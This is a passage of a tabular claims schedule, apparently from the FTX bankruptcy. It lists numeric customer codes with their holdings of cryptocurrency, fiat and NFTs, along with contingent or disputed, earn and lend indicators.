| 07408555 | | BRZ[2], BTC[.18046813], CUSDT[1], DOGE[5], ETH[.87482194], ETHW[.87482194], NFT [405811300443820760/Coachella x FTX Weekend 1 #21857][1], SOL[36.65715072], TRX[7], USD[0.00] | | |
| 07408559 | | BTC[.00022412], CUSDT[1], USD[0.00] | | |
| 07408562 | | NFT [302593014582846597/GSW Western Conference Finals Commemorative Banner #833][1], NFT [323975337026561350/GSW Western Conference Finals Commemorative Banner #834][1], NFT [364945460588650047/GSW Western Conference Finals Commemorative Banner #836][1], NFT [365961436930287543/GSW Western Conference Semifinals Commemorative Ticket #515][1], NFT [366583314412611361/Warriors Logo Pin #22 (Redeemed)][1], NFT [415674536440885352/Warriors Logo Pin #5 (Redeemed)][1], NFT [436782355727982856/GSW Western Conference Finals Commemorative Banner #835][1], NFT [446207838122153697/GSW Championship Commemorative Ring][1], NFT [469269143871023246/GSW Round 1 Commemorative Ticket #499][1], NFT [474253822992410023/GSW Western Conference Semifinals Commemorative Ticket #514][1], NFT [509469940010745801/GSW Championship Commemorative Ring][1], USD[0.02] | | |
| 07408567 | | BAT[1.00631555], CUSDT[1], LINK[1.02758812], SOL[.00129762], TRX[2], USD[5435.73], USDT[1.09406522] | Yes | |
| 07408570 | | BAT[1.0165555], BRZ[1], CUSDT[2], DOGE[8.51487705], SOL[.0002754], SUSHI[31.77341196], TRX[1], USD[27.76] | Yes | |
| 07408572 | | SHIB[1], SOL[0], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07408574 | | GRT[1000.625], LINK[7], MATIC[100], SOL[1.0087], SUSHI[40.04], USDT[0], YFI[.0107541] | | |
| 07408577 | | LINK[60.7737], SOL[150.495], USD[759.73] | | |
| 07408580 | | BTC[0], ETH[0.00084100], ETHW[0.00084100], SOL[.00046], USD[2.95] | | |
| 07408585 | | CUSDT[1], USD[0.00] | | |
| 07408586 | | BAT[63.10423764], CUSDT[2], DOGE[1734.21209911], TRX[1897.88621876], USD[50.00] | | |
| 07408598 | | USD[0.00] | | |
| 07408599 | | BTC[0.00008355], MKR[.00094258], SOL[.002], USD[0.34] | Yes | |
| 07408600 | | BTC[0.00006149], ETH[.000792], ETHW[.000792], NFT (390193467254981159/Romeo #1060)[1], USD[27.47] | | |
| 07408602 | | DOGE[3359.637], SOL[.09], USD[3.93] | | |
| 07408604 | | ETH[.000348], ETHW[.000348] | | |
| 07408605 | | BRZ[1.00001043], CUSDT[7], DOGE[1], SHIB[20.94955128], USD[0.00] | Yes | |
| 07408610 | | BTC[.00010496], CUSDT[3], DOGE[147.34606413], ETH[.02225451], ETHW[.02225451], USD[0.00] | | |
| 07408613 | | ETH[.00045648], ETHW[.00045648], USD[0.00] | Yes | |
| 07408614 | | BTC[0], TRX[.548], USD[0.59] | | |
| 07408619 | | GRT[0.09304221], USD[0.17], USDT[0.00000001] | | |
| 07408630 | | BAT[1.00579742], CUSDT[3], DOGE[3], SHIB[1], TRX[3], USD[0.01] | Yes | |
| 07408637 | | USD[12.49], USDT[0] | | |
| 07408640 | | BRZ[0], BTC[0.00086338], ETH[0.04113155], ETHW[0.04113155], GRT[0], LINK[0], USD[0.00] | | |
| 07408643 | | BTC[0], DOGE[0], MATIC[15.85124622], SHIB[20218071.78809856], TRX[.000001], USD[-4.26], USDT[0] | | |
| 07408646 | | BTC[.00069899], TRX[0], USD[0.04] | | |
| 07408655 | Contingent, Disputed | DOGE[1], TRX[1], USD[0.00] | Yes | |
| 07408660 | | USD[0.01] | | |
| 07408661 | Contingent, Disputed | LTC[.00827966], USDT[.2312736] | | |
| 07408665 | | CUSDT[1], DOGE[1], SUSHI[47.29599267], TRX[2], USD[468.35] | | |
| 07408666 | | BTC[0], SOL[0], USD[0.00] | | |
| 07408669 | | DOGE[1], TRX[2], USD[0.79] | Yes | |
| 07408679 | | USD[10.00] | | |
| 07408682 | | NFT (417228747447898350/Roll #1758)[1] | | |
| 07408686 | | ETH[.00000001], ETHW[0], SOL[0.00569978], USD[0.93] | | |
| 07408688 | | USD[1000.00] | | |
| 07408690 | | DOGE[.99], TRX[15.988777], USD[6.70] | | |
| 07408691 | | TRX[0.00000399], USD[0.00], USDT[0.00000001] | | TRX[.000003] |
| 07408697 | | BTC[.00000002], CUSDT[11], DOGE[152.26037569], ETH[.01285418], ETHW[.01269002], SOL[.2286937], TRX[1], USD[0.00] | Yes | |
| 07408699 | | TRX[.000004], USD[0.53], USDT[0.00670100] | | |
| 07408701 | | BAT[21.4362019], CUSDT[3], USD[0.01] | | |
| 07408706 | | USD[0.14] | | |
| 07408707 | | TRX[.829] | | |
| 07408709 | | TRX[7.800003], USD[0.98], USDT[0.00000001] | | |
| 07408710 | | USD[0.00] | | |
| 07408713 | | BRZ[1], CUSDT[12], NFT (472946149600399276/Miami Ticket Stub #149)[1], SHIB[31695.72683523], TRX[1], USD[0.01] | Yes | |
| 07408715 | | CUSDT[1], USD[0.01] | | |
| 07408725 | | BTC[.00471364], DOGE[2], ETH[.01355031], ETHW[.01355031], TRX[1], USD[0.00] | | |
| 07408726 | | ETHW[0], LINK[0], MATIC[0], SOL[0], TRX[.000001], USD[0.00], USDT[0] | | |
| 07408728 | | BRZ[2], BTC[.00002969], GRT[2.04566088], SHIB[2], SUSHI[1.08216078], TRX[2], USD[0.01] | Yes | |
| 07408730 | | BCH[0], BRZ[2], BTC[0], CUSDT[5], DOGE[0], ETH[0], LTC[0], PAXG[0], SOL[0], TRX[2] | | |
| 07408742 | | USD[1.79] | | |
| 07408746 | | AAVE[.1865685], BTC[.00038177], CUSDT[20], DOGE[47.18287627], ETH[.0265335], ETHW[.02620518], GRT[78.8964265], LTC[.22316212], MATIC[22.45805258], MKR[.01198969], SHIB[1], SOL[.15913563], SUSHI[5.3906685], TRX[4], UNI[.46800352], USD[7.09], USD[0] | Yes | |
| 07408747 | | DOGE[1895.20199905], USD[0.00] | | |
| 07408750 | | CUSDT[4], DOGE[1.9999967], TRX[2], USD[0.00] | | |
| 07408751 | | BTC[0.00009567], LTC[0], NFT (305230481800168804/doodle cats #2)[1], NFT (343911465360737803/doodle cats #5)[1], NFT (348193323177399500/doodle cats #4)[1], NFT (390589736566634295/doodle cats #3)[1], NFT (497653096581105524/doodle cats #1)[1], SOL[13.43000000], USD[0.00], USDT[0], WBTC[0.00015571] | | |
| 07408755 | | DOGE[176.58159077], TRX[1], USD[0.01] | | |
| 07408758 | | CUSDT[1], SOL[0], TRX[0], USD[0.00] | | |
| 07408759 | | BRZ[2], BTC[.23709975], CUSDT[10], DOGE[1151.00382465], ETH[1.85342717], ETHW[1.85342717], SOL[20.10188171], TRX[4], USD[0.00] | | |
| 07408762 | | DOGE[1.00003402], USD[31.63] | | |
| 07408764 | | TRX[4.01367386], USD[0.00] | Yes | |
| 07408768 | | BAT[175.20882088], CUSDT[1], DOGE[1], GRT[55.57016402], USD[0.00] | | |
| 07408771 | | BRZ[2], CUSDT[1], SOL[.0000138], TRX[3], USD[0.78] | | |
| 07408777 | | BTC[0], ETH[0], ETHW[0], SOL[0], USD[2999.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07408778 | | NFT (2947598873609109121/Unity #299)[1], NFT (3025449295820938887/Unity #461)[1], NFT (3062147534000816688/Unity #459)[1], NFT (3083851989139812331/Unity #444)[1], NFT (3142625841738223891/Unity #479)[1], NFT (3410226639157598870/Unity #289)[1], NFT (3600265269602425668/Unity #456)[1], NFT (3892542045100189601/Unity #436)[1], NFT (4204199848756395231/Unity #429)[1], NFT (4261843167440309682/Unity #414)[1], NFT (4704874576621616431/Unity #450)[1], NFT (5149525953723570091/Unity #189)[1], NFT (5155261490241477291/Unity #159)[1], NFT (5508417062198635262/Unity #463)[1], NFT (5717855604947788101/Unity #443)[1], SOL[0], USD[0.01] | | |
| 07408779 | | BTC[.01749994], ETH[0.24157668], ETHW[0.24157668], USD[0.01] | | |
| 07408782 | | BTC[.00160287], DAI[175.81516880], DOGE[2382.24396476], ETH[.00168467], ETHW[.00165729], GRT[.0124509], USD[0.00] | Yes | |
| 07408786 | | BRZ[1], CUSDT[1], DOGE[1], ETH[0], USD[489.07] | | |
| 07408792 | | BTC[0], TRX[.000005], USD[0.00], USDT[0.00000026] | | |
| 07408798 | | USD[0.00], USDT[0] | | |
| 07408799 | | BTC[.00000003], GRT[.87674598], LTC[.00983943], USD[3799.73] | | |
| 07408800 | | BTC[.00861942], USD[209.16], USDT[1] | | |
| 07408804 | | AVAX[0], NFT (3498548852444326028/Saudi Arabia Ticket Stub #2010)[1], NFT (4116962038223114451/Romeo #408)[1], NFT (4232553701171233664/Good Boy #5163)[1], NFT (4888601024296798889/Humpty Dumpty #543)[1], SOL[.00177877], USD[0.00], USDT[0] | Yes | |
| 07408812 | | DOGE[1], USD[0.00] | | |
| 07408814 | | DOGE[0], ETH[1.02983077], ETHW[1.02983077], MATIC[0], NFT (3282011077745907761/Grumpy Grandpas #1951)[1], NFT (4716362559080800313/Grumpy Grandpas #1881)[1], SHIB[0], SOL[0.00000001], USD[0.00], USDT[0.00000350] | | |
| 07408816 | | AVAX[.07143411], BCH[.00000053], BTC[.00461094], CUSDT[1], DAI[4.95816223], DOGE[789.23306216], ETH[.02924016], ETHW[.02924016], LINK[.21524391], PAXG[.00320065], SHIB[4], SOL[.83488851], TRX[1], UNI[.22522171], USD[0.00] | | |
| 07408817 | | BTC[0], ETH[0], USD[1.90], USDT[0] | | |
| 07408824 | | CUSDT[3], SHIB[1], TRX[2], USD[0.01] | Yes | |
| 07408828 | | SOL[.00885877], USD[1.46] | | |
| 07408831 | | DOGE[1.51808916], TRX[2.316803], USD[0.10] | | |
| 07408844 | | USD[20.00] | | |
| 07408848 | | BTC[.03864912], ETH[0.28098885], ETHW[0.28098885], USD[5.09] | | |
| 07408849 | | BTC[.00308958], DOGE[1], USD[0.00] | | |
| 07408850 | | BTC[.00114696], DOGE[1666.54664746], TRX[1], USD[0.00] | Yes | |
| 07408865 | | BAT[6], BRZ[5], BTC[0], CUSDT[7], DOGE[5], GRT[2], SOL[0], SUSHI[1], TRX[8], USD[0.00], USDT[1.00000008] | | |
| 07408876 | | CUSDT[2], DOGE[2], GRT[1], TRX[2], USD[0.01], USDT[0] | | |
| 07408880 | | DOGE[2715.17204295], ETH[6.10810543], ETHW[6.10554003], SHIB[2171908.25080971], USD[0.00], USDT[0] | Yes | |
| 07408884 | | DOGE[3], USD[0.01] | | |
| 07408886 | | DAI[.00000001], ETH[.0008426], ETHW[.0008426], SOL[.9032], TRX[.1952], USD[101.02] | | |
| 07408887 | | MATIC[2000], SOL[0], USD[0.00] | | |
| 07408900 | | CUSDT[2], DOGE[1.00008219], TRX[1016.30309466], USD[0.23] | | |
| 07408904 | | CUSDT[1], DOGE[4], TRX[1], USD[0.92] | | |
| 07408905 | | SOL[50], USD[1.06] | | |
| 07408906 | | SOL[0], TRX[1] | | |
| 07408908 | Contingent, Disputed | USD[0.00] | | |
| 07408909 | | BRZ[1], SOL[0], USD[0.89] | | |
| 07408910 | | TRX[1], USD[0.00] | | |
| 07408915 | | TRX[.100006] | | |
| 07408918 | | BAT[0], BRZ[0], CUSDT[0], DOGE[0], GRT[0], TRX[0], USD[0.01] | Yes | |
| 07408921 | | BTC[.0039936], CUSDT[6], DOGE[5], LINK[1.23443187], MATIC[.0001329], SOL[2.36876936], SUSHI[1.01684438], TRX[2], USD[0.00] | | |
| 07408929 | | USD[0.01] | | |
| 07408931 | | USD[1.62] | | |
| 07408932 | | BRZ[1], CUSDT[6], DOGE[337.90779018], ETH[.03191173], ETHW[.03191173], SOL[1.25933636], TRX[2], USD[26.64] | | |
| 07408937 | | BAT[1.87234609], BRZ[1], CUSDT[3], USD[0.00], USDT[0] | Yes | |
| 07408939 | Contingent, Disputed | BTC[.00004661], USD[0.69] | | |
| 07408942 | | SOL[28.7376], SUSHI[5.976], USD[1.08] | | |
| 07408953 | | BAT[1], BRZ[2], DOGE[1], ETH[.92231484], ETHW[.92231484], GRT[1], TRX[2], USD[0.00], USDT[2] | | |
| 07408959 | | BRZ[1], DOGE[2], SOL[.35393013], TRX[1], USD[0.00] | | |
| 07408961 | | SOL[0], USD[1.01] | | |
| 07408962 | | BTC[.0000426], SOL[.54814], USD[0.00], USDT[0.00122197] | | |
| 07408963 | | AVAX[0.76025706], BAT[4.10114861], BRZ[1], BTC[0], CUSDT[3], DAI[0.61872755], DOGE[33.35755490], ETH[0], ETHW[0], GBP[0.00], GRT[5.024856], LINK[0.46066668], MATIC[.01943711], SHIB[0.00000001], SOL[0], SUSHI[0.40592288], TRX[16.26029876], USD[0.00], USDT[4.10115834], YFI[.00000535] | Yes | |
| 07408973 | | CUSDT[1], SOL[49.44802498], TRX[1], USD[300.00] | | |
| 07408974 | | BTC[0], UNI[.00846868] | | |
| 07408975 | | SOL[0], USD[0.00] | | |
| 07408976 | | DOGE[0], SOL[0] | | |
| 07408980 | | BRZ[1], BTC[0], TRX[2], USD[0.00] | | |
| 07408982 | | BRZ[1], BTC[0], CUSDT[1], TRX[2], USD[0.01], USDT[0] | | |
| 07408983 | | CUSDT[1], DOGE[2], SOL[1.95167222], TRX[1.1015918], USD[0.00] | | |
| 07408990 | | DOGE[0.04307747], ETH[0.00001266], ETHW[0.00001266], LTC[0], SOL[0], TRX[0], USD[0.00] | Yes | |
| 07408993 | | BAT[3.25670316], CUSDT[2], DOGE[2], TRX[1], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07408998 | | CUSDT[1], USD[0.19] | | |
| 07409004 | | BTC[.00000053], DOGE[2], SHIB[5], TRX[4], USD[0.00] | Yes | |
| 07409005 | | TRX[1993.972386], XRP[68.475] | | |
| 07409012 | | BRZ[1], CUSDT[3], DOGE[3], TRX[93.38813793], USD[0.00], USDT[2] | | |
| 07409014 | | USD[23.70] | | |
| 07409016 | | CUSDT[1], ETH[0], SHIB[11807310.20495618], SOL[21.63135407], USD[0.97] | Yes | |
| 07409019 | | DOGE[.6071], SOL[.15], USD[0.79] | | |
| 07409027 | | BTC[0], ETH[.00000001], ETHW[0], SOL[0], USD[0.00] | | |
| 07409029 | | BCH[10.20930457], BTC[0.09599876], CUSDT[1], DOGE[1], GRT[1], SOL[1], TRX[1], USD[0.00], USDT[1] | | |
| 07409035 | Contingent, Disputed | USD[0.55], USDT[0] | | |
| 07409036 | | BTC[0], USD[0.00] | | |
| 07409037 | | SOL[.001198], USD[0.03], USDT[0] | | |
| 07409041 | | DOGE[1], USD[0.00] | Yes | |
| 07409042 | | BRZ[1], CUSDT[5], DOGE[1], ETH[0], LTC[0.00004598], PAXG[0], TRX[0.00069619], USD[0.00] | | |
| 07409044 | | BTC[0], USD[51.75] | | |
| 07409048 | | BTC[0], ETH[.00000001], ETHW[0], LTC[0], USD[0.00] | | |
| 07409051 | | BAT[1], BRZ[5.02660006], BTC[0], DOGE[3], GRT[1], NFT (361960519815300288/Imola Ticket Stub #559)[1], NFT (513512969732398722/Entrance Voucher #3909)[1], SHIB[7], SOL[0], TRX[8], USD[0.80], USDT[1.04780121] | Yes | |
| 07409052 | | USD[5000.00] | | |
| 07409059 | | USD[0.01] | Yes | |
| 07409062 | | USD[0.11], USDT[0.00000033] | | |
| 07409064 | | BTC[0.00000001], ETH[.00000002], USD[0.00], USDT[0.00000001] | | |
| 07409066 | | BRZ[1], CUSDT[4], DOGE[1], USD[0.00] | | |
| 07409071 | | BAT[.0417007], CUSDT[3], DOGE[2567.29832921], TRX[157.16010932], USD[193.89] | | |
| 07409072 | Contingent, Disputed | ETH[.00000001], ETHW[0], LINK[.00000001] | Yes | |
| 07409075 | | USD[0.01], USDT[0] | | |
| 07409076 | | BRZ[1], BTC[.00020377], CUSDT[11], DOGE[0], SOL[0.07078696], TRX[360.59695882], USD[0.00] | | |
| 07409088 | | BTC[.00003179], LINK[.01114], SUSHI[.1295], USD[2581.18] | | |
| 07409095 | | BTC[0], ETH[0], SOL[15.72974042], USD[2.53] | | |
| 07409097 | | CUSDT[1], DOGE[2329.21634088], TRX[1], USD[150.01] | | |
| 07409100 | | DOGE[1], SOL[353.59666648], USD[0.00] | | |
| 07409104 | | BTC[0], ETH[0], SOL[0], USD[384.80] | | |
| 07409107 | | BTC[.01110285], CUSDT[8], DOGE[30.47307716], ETH[.02942033], ETHW[.0290507], LINK[1.17542148], SOL[5.451298], TRX[3], UNI[.00066941], USD[-85.00] | Yes | |
| 07409109 | | BTC[0], SOL[0], USD[1.86] | | |
| 07409110 | | AAVE[4.74612229], ALGO[500.15940865], AVAX[47.81045472], BRZ[3], ETH[.00000754], ETHW[45.26362316], MATIC[986.01088675], SHIB[10], SOL[.00091509], SUSHI[189.67860635], TRX[2852.38223831], USD[3392.17], USDT[0.00000001] | Yes | |
| 07409114 | | NFT (438264836403223690/Entrance Voucher #4226)[1] | | |
| 07409119 | | CUSDT[1], DOGE[1], USD[0.00] | Yes | |
| 07409123 | | USD[0.02] | | |
| 07409124 | | BTC[0.00001812], SOL[47.31] | | |
| 07409125 | | BTC[.0059896], CUSDT[3], DOGE[511.6849189], USD[0.00] | Yes | |
| 07409127 | | BTC[0], TRX[0], USD[0.01], USDT[0] | | |
| 07409128 | | USD[0.00], USDT[0] | | |
| 07409130 | | SOL[.64] | | |
| 07409132 | | CUSDT[3], TRX[3], USD[0.00], USDT[2.17591343] | Yes | |
| 07409134 | | BRZ[1], CUSDT[4], DOGE[419.85714594], SOL[2.8254509], TRX[1], USD[0.00] | Yes | |
| 07409135 | | BRZ[1], DOGE[2], GRT[98.61744929], SOL[9.7770515], TRX[4043.94935543], UNI[1.57010634], USD[3.00], USDT[1] | | |
| 07409137 | | ETH[.000731], ETHW[.000731] | | |
| 07409139 | | ETH[0], SOL[52.66], USD[0.33] | | |
| 07409144 | | BTC[0], CUSDT[5], DOGE[0], ETH[0], ETHW[0], GRT[0], LTC[0], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0] | | |
| 07409149 | | ETH[0], ETHW[0], USD[0.00], USDT[0] | | |
| 07409154 | | DOGE[0], USD[0.00] | | |
| 07409158 | | CUSDT[2], DOGE[0], GRT[2], TRX[619.33338178], USD[0.43], USDT[1] | | |
| 07409169 | | BRZ[3], CUSDT[2], DOGE[1], SHIB[4291218.29782606], SOL[11.63439973], TRX[1], USD[0.00] | Yes | |
| 07409171 | | TRX[2], USD[0.00] | | |
| 07409175 | | BCH[.000535], BTC[.00001436], LINK[.0596], TRX[.000006], USD[10.73] | | |
| 07409176 | | BTC[.19685688], SOL[17.53245], USD[88.85] | | |
| 07409177 | | USD[0.00] | | |
| 07409178 | | SOL[.03], USD[0.14] | | |
| 07409183 | | AAVE[0], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07409184 | Contingent, Disputed | BRZ[1], BTC[.00499192], DOGE[1], TRX[1], USD[0.92] | | |
| 07409187 | | BTC[.00019809], USD[0.00] | | |
| 07409190 | | BTC[.00849404], CUSDT[1], DOGE[1], SHIB[2], TRX[1], USD[0.00] | | |
| 07409194 | | TRX[2], USD[0.00] | Yes | |
| 07409197 | | ETH[0], SOL[.00000001], USD[0.30] | | |
| 07409200 | | BTC[0], ETH[.00050136], ETHW[.00050136], NFT (399890808011621705/Imola Ticket Stub #413)[1], NFT (469159639035187862/Geovaldi #76)[1], NFT (497159334756203726/Lobus #58)[1], SOL[12.56415746], USD[1.35] | | |
| 07409202 | | ETHW[.159], GRT[.98], LTC[.00649329], SUSHI[.292], TRX[.96], USD[525.63] | | |
| 07409203 | | NFT (494359744841844391/Coachella x FTX Weekend 1 #28169)[1] | | |
| 07409208 | | DOGE[1], USD[2.00] | | |
| 07409209 | | BRZ[2], BTC[0], CUSDT[2], DOGE[1], TRX[2], USD[0.01] | Yes | |
| 07409213 | | SOL[0], USD[0.00], USDT[0.00000005] | | |
| 07409222 | | USD[0.00] | | |
| 07409223 | | CUSDT[4], TRX[3], USD[0.18] | | |
| 07409229 | | USD[0.03], USDT[2.67926900] | | |
| 07409231 | | BAT[2], BRZ[3], CUSDT[3], DOGE[5], GRT[2], SOL[22.61031298], TRX[25.07119151], USD[0.01] | | |
| 07409233 | | DAI[0], DOGE[0], LTC[0], TRX[.1430121], USD[0.00] | Yes | |
| 07409235 | | CUSDT[5069.23651749], DOGE[67931.84447257], GRT[1], SHIB[8770607.81350605], SOL[1.17672292], TRX[1530.10045115], UNI[12.33141092], USD[0.01], USDT[107.23768666] | Yes | |
| 07409239 | | CUSDT[2], DOGE[1], SOL[2.68286363], USD[0.00] | | |
| 07409241 | | ETH[.00000001], NFT (416655734441092062/Microphone #8930)[1], SOL[0.00000001], USD[0.00] | | |
| 07409242 | | BAT[5.93750368], BRZ[27.60130576], CUSDT[1], DOGE[3], ETH[.00685067], ETHW[.00685067], SOL[0.53258298], TRX[103.60800081], UNI[.14598792], USD[0.00] | | |
| 07409246 | | DOGE[.72386237], TRX[.000098], USD[0.45], USDT[0.00000001] | | |
| 07409248 | | USD[0.16] | | |
| 07409252 | | BCH[.50006948], BRZ[1], CUSDT[5], DOGE[1244.21204319], LINK[2.00431692], TRX[1], USD[0.29] | | |
| 07409254 | | USD[0.06] | | |
| 07409255 | | BAT[1], CUSDT[5], DOGE[1239.28048733], SOL[7.12257217], TRX[314.04042296], USD[34.00] | | |
| 07409256 | | TRX[907.636], USD[0.01] | | |
| 07409258 | | BAT[.82995], BTC[.00001469], ETH[.00049995], ETHW[1.57749995], LINK[.085845], MATIC[.905], SOL[.00973], TRX[.3736], USD[2450.01], USDT[0] | | |
| 07409260 | | DOGE[0.11621956], ETH[0], USD[0.00] | Yes | |
| 07409264 | | BTC[.000192] | | |
| 07409267 | | BTC[.00000245] | Yes | |
| 07409274 | | BTC[.00144526], DOGE[.00048692], ETH[.00835929], ETHW[.00824985], LINK[0.00194188], MATIC[6.23241050], SOL[0.16299816], USD[3.01] | Yes | |
| 07409275 | | BTC[.00550186], DOGE[1], USD[0.00] | Yes | |
| 07409277 | | BRZ[1], CUSDT[4], LINK[0], USD[0.00] | | |
| 07409279 | | BTC[.0000889], MATIC[9.95], SOL[1.44339], SUSHI[3.996], USD[0.43] | | |
| 07409288 | | BTC[.00026261], USD[1.11] | | |
| 07409292 | | SOL[0.00196699], USD[11.48] | | |
| 07409293 | | LTC[0], SOL[0], TRX[0], USD[0.00], USDT[0] | | |
| 07409301 | | BTC[0], SOL[0] | | |
| 07409313 | | DOGE[28.99229984], ETH[.16089327], ETHW[.16089327], GRT[44.77792295], LINK[1.59744469], LTC[.47980238], MATIC[54.65442015], MKR[.00685733], SHIB[145243.28249818], SOL[.72001214], TRX[0], UNI[.28946961], USD[0.00], USDT[0.00012200] | | |
| 07409314 | | BTC[0], ETH[0], ETHW[0], LTC[0.00531574], SUSHI[.494], TRX[.9], USD[0.32] | | |
| 07409319 | | BRZ[0], BTC[0.00000757], DAI[0], DOGE[0], ETH[0.00011281], ETHW[0.00011281], GRT[0.16951248], LINK[0], MATIC[0.10016640], SOL[0], USD[0.00] | Yes | |
| 07409322 | | SOL[.0024], USD[0.19] | | |
| 07409326 | | CUSDT[1], DOGE[3], TRX[.00006276], USD[0.00] | | |
| 07409327 | | LTC[0], SOL[0], USD[0.00], USDT[0] | | |
| 07409336 | Contingent, Disputed | BTC[0], CUSDT[5], DAI[0], DOGE[4], SUSHI[0], TRX[1], USD[0.00], USDT[0.00000005] | | |
| 07409349 | | USD[1662.52] | Yes | |
| 07409350 | | BRZ[3], CUSDT[1], DOGE[6], SOL[80.40730497], TRX[3015.84766051], USD[0.00] | | |
| 07409353 | | BRZ[4], BTC[0.01000775], CUSDT[22], DOGE[4], ETH[0.00000047], ETHW[0.00000047], LTC[.00000485], SHIB[1], SOL[0], TRX[2], UNI[0], USD[0.01], USDT[0.00030862] | Yes | |
| 07409357 | | BRZ[3], BTC[.00566865], CUSDT[199.43786626], ETHW[.29145589], SHIB[9], TRX[.01934403], USD[0.00] | Yes | |
| 07409370 | | BRZ[1], DOGE[141.72956365], USD[0.45] | | |
| 07409372 | | DOGE[0], USDT[0] | | |
| 07409374 | | GRT[2.99251246], TRX[2], USD[0.00], USDT[9.9470557] | | |
| 07409375 | | BAT[6.04249636], BTC[0.00025265], DOGE[76.26041686], ETH[0], ETHW[0], GRT[4], LTC[0], MATIC[1.00015521], SHIB[336], SOL[0.00000281], TRX[1], USD[4141.07], USDT[0] | Yes | |
| 07409380 | | CUSDT[1], DOGE[1], LINK[.00004835], USD[0.01] | | |
| 07409382 | | BAT[3.19985353], CUSDT[5], GRT[4.21077335], TRX[6], USD[0.31], USDT[6.56882954] | Yes | |
| 07409383 | | USD[0.00] | | |
| 07409385 | | ETH[.00330636], ETHW[0.00330636] | | |
| 07409387 | | BTC[0.04760428], DOGE[480.40055], ETH[1.28556314], ETHW[1.28556314], LINK[28.97245], SOL[56.949823], SUSHI[56.88885], USD[5.88], USDT[.1066629] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07409389 | | BTC[0], SOL[19.02161824], USD[0.00] | | |
| 07409392 | | USD[0.00] | | |
| 07409394 | | BTC[.00071209], SOL[4.98] | | |
| 07409396 | | BRZ[2], BTC[.00525069], CUSDT[8], DOGE[869.2730461], ETH[.38650532], ETHW[.38650532], LINK[1.01925878], PAXG[.01089023], SOL[8.00954117], TRX[4], USD[0.00], USDT[1] | | |
| 07409402 | | DOGE[5516.169], SOL[53.00669], USD[0.01] | | |
| 07409406 | | USD[0.00] | | |
| 07409412 | | BAT[1.0165555], BRZ[3], CUSDT[8], DOGE[4.0206558], GRT[3.14873602], TRX[4], UNI[.00668888], USD[8.17], USDT[1.10385913] | Yes | |
| 07409417 | | BTC[0], ETH[.00000001], SOL[0], USD[0.00], USDT[0] | | |
| 07409421 | | DOGE[1], SOL[16.70732288], USD[0.00] | Yes | |
| 07409428 | | DOGE[1343.39264383], TRX[1], USD[-20.00] | | |
| 07409433 | | TRX[.000001], USDT[.0443825] | | |
| 07409440 | | DAI[0], ETH[0], LINK[0], MATIC[.00000001], SOL[0], SUSHI[0], UNI[0], USD[2.69], USDT[0.00000160] | | |
| 07409444 | | BRZ[2], CUSDT[8], DOGE[.7135518], TRX[4], USD[3.06], USDT[1] | | |
| 07409448 | | BTC[0.00008336], ETH[.00045712], ETHW[.00045712], LINK[.0378575], SOL[.003541], SUSHI[.3926], TRX[.50049], USD[0.01], USDT[0.73730607], YFI[0.00024237] | | |
| 07409449 | | CUSDT[2], DOGE[86.53965187], SHIB[366983.04518729], TRX[1], USD[0.01] | Yes | |
| 07409452 | | CUSDT[5], DAI[.00006074], DOGE[0], TRX[1000.70087549], USD[0.00] | | |
| 07409453 | | CUSDT[2], DOGE[2], TRX[.00027685], USD[0.01] | | |
| 07409455 | | SOL[.14677908], USDT[44.15557320] | Yes | |
| 07409459 | | BAT[2], BRZ[4], CUSDT[7], DOGE[1], TRX[11], USD[0.14], USDT[.33814153] | | |
| 07409465 | | BTC[.00072782], CUSDT[3], DOGE[5635.82069481], TRX[1], USD[0.08] | Yes | |
| 07409469 | | DOGE[0] | | |
| 07409473 | | USD[0.00] | | |
| 07409485 | | CUSDT[1], USD[0.00] | | |
| 07409491 | | USD[1.00] | | |
| 07409494 | | BTC[.0125727], USD[194.59] | | |
| 07409497 | | BAT[0], CUSDT[2], DOGE[2], GRT[1], SOL[0], TRX[1], UNI[0], USD[0.00] | | |
| 07409498 | | USD[0.00] | | |
| 07409507 | | SOL[.25186645] | | |
| 07409508 | | CUSDT[284], USD[12.67] | | |
| 07409512 | | BTC[0.00002395], SOL[425.7195], USD[2.03] | | |
| 07409513 | | BTC[0], CUSDT[2], DOGE[0.00000670], USD[0.00] | | |
| 07409514 | | BTC[0], DOGE[.06824197], LTC[0], USD[0.00] | | |
| 07409515 | | USD[100.00] | | |
| 07409528 | | ETHW[2.646572], USD[0.09] | | |
| 07409534 | | DOGE[449.39639101], USD[25.00] | | |
| 07409537 | | BRZ[2], CAD[0.00], CUSDT[37.06900773], HKD[0.00], SHIB[0], USD[0.00] | Yes | |
| 07409540 | | DOGE[1], USD[22.05] | | |
| 07409541 | | BAT[1], SOL[0] | | |
| 07409543 | | USD[3.21] | | |
| 07409547 | | DOGE[1], USD[0.02] | | |
| 07409548 | | BAT[2.09067649], BRZ[3], CUSDT[1], DOGE[3], TRX[1], UNI[1.08821602], USD[0.00], USDT[1.09498317] | Yes | |
| 07409551 | | USD[.10], USDT[0.00000014] | | |
| 07409557 | | AUD[0.00], BRZ[0], BTC[0], CAD[0.00], DOGE[1], EUR[0.00], GBP[0.00], GRT[.00095617], SGD[0.00], USD[0.00], USDT[0.00046534] | | |
| 07409563 | | BTC[0.00005099], DOGE[.49715], ETH[0], LINK[.00389], LTC[.0074755], SOL[.0010225], USD[1.27], USDT[0.71884446] | | |
| 07409573 | Contingent, Disputed | BTC[.30821217], DOGE[1], UNI[1], USD[0.00], USDT[1] | | |
| 07409576 | | CUSDT[2], USD[0.96] | | |
| 07409595 | Contingent, Disputed | USD[0.00] | | |
